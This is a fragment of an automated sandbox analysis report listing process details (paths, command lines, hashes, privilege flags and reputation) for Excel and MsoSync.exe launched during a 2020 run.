                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Start time:08:55:15
                                                                                                                                                          Start date:19/11/2020
                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                          Imagebase:0xaf0000
                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:08:55:19
                                                                                                                                                          Start date:19/11/2020
                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                          Imagebase:0xf40000
                                                                                                                                                          File size:466688 bytes
                                                                                                                                                          MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          Disassembly

                                                                                                                                                          Reset < >